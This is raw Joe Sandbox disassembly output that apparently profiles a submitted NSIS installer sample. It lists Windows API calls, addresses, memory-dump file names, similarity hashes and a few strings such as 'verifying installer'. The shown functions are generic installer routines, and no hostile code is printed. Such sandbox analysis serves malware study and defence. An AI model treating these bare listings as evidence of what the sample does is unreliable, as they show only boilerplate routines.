                                                                                                                    • String ID: 9
                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                    • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                    • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                    • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                    • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2531174081-0
                                                                                                                    • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                    • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                    • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                    • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                    • wsprintfW.USER32 ref: 00402EF5
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                      • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                      • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                      • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                    • String ID: ... %d%%
                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                    • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                    • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                    • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                    • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                    • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                    • String ID: f
                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                    • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                    • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                    • wsprintfW.USER32 ref: 004067A4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                    • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                    • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                    • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                    • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                    APIs
                                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                                    • wsprintfW.USER32 ref: 00402E45
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                    • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                    • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                    • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                    • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2667972263-0
                                                                                                                    • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                                    • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                    • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                                    • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                    • wsprintfW.USER32 ref: 00404CB6
                                                                                                                    • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                    • String ID: %u.%u%s%s$(7B
                                                                                                                    • API String ID: 3540041739-1320723960
                                                                                                                    • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                    • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                    • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                    • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                    APIs
                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                    • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                    • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                    • String ID: *?|<>/":
                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                    • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                    • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                    • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                    • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                    APIs
                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                      • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                      • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1941528284-0
                                                                                                                    • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                    • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                    • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                    • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                    • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3808545654-0
                                                                                                                    • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                    • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                    • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                    • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1849352358-0
                                                                                                                    • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                    • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                    • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                    • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                    • String ID: !
                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                    • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                    • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                    • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                    • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$Enum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 464197530-0
                                                                                                                    • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                    • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                    • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                    • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                    • GetLastError.KERNEL32 ref: 00405976
                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                    • GetLastError.KERNEL32 ref: 00405995
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3449924974-0
                                                                                                                    • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                    • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                    • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                    • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405D76
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                    • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405E1E
